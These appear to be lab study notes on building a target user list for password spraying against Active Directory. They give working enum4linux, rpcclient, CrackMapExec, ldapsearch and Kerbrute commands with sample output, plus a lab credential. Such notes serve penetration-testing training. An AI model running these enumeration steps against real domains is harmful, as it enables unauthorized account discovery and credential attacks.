Password Spraying - Making a Target User List ACTIVE Directory

By leveraging an SMB NULL session
- retrieve a complete list of domain users from the domain controller
Utilizing an LDAP anonymous bind to query LDAP anonymously
- pull down the domain user list
Use tool such as
- Kerbrute to validate users utilizing a word list
  - from a source such as the
    linkedin2username
    statistically-likely-usernames
  - LLMNR Poisoning

Using enum4linux

SMB NULL Session to Pull User List

enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

administrator
guest
krbtgt

Using rpcclient

SMB NULL Session to Pull User List

 rpcclient -U "" -N 172.16.5.5

enumdomusers

rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers user:[administrator] rid:[0x1f4] user:[guest] rid:[0x1f5]

Using CrackMapExec --users Flag

SMB NULL Session to Pull User List

crackmapexec smb 172.16.5.5 --users

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain user(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\administrator                  badpwdcount: 0 baddpwdtime: 2022-01-10 13:23:09.463228
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\guest                          badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\lab_adm

Gathering Users with LDAP Anonymous

Some examples include windapsearch and ldapsearch.

Using ldapsearch

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "

Using windapsearch

windapsearch

Enumerating Users with Kerbrute

look into statistically-likely-usernames for username list
- linkedin2username
- jsmith.txt is from this list

kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt

Using Kerbrute for username enumeration will generate event ID 4768: A Kerberos authentication ticket (TGT) was requested
- will be triggered if Kerberos event logging is enabled via Group Policy

Credentialed Enumeration to Build our User List

With valid credentials,
- can use any of the tools stated previously to build a user list. A quick and easy way is using CrackMapExec.

Using CrackMapExec with Valid Credentials

sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users

PreviousInveighZero NextKerbrute

Last updated 10 months ago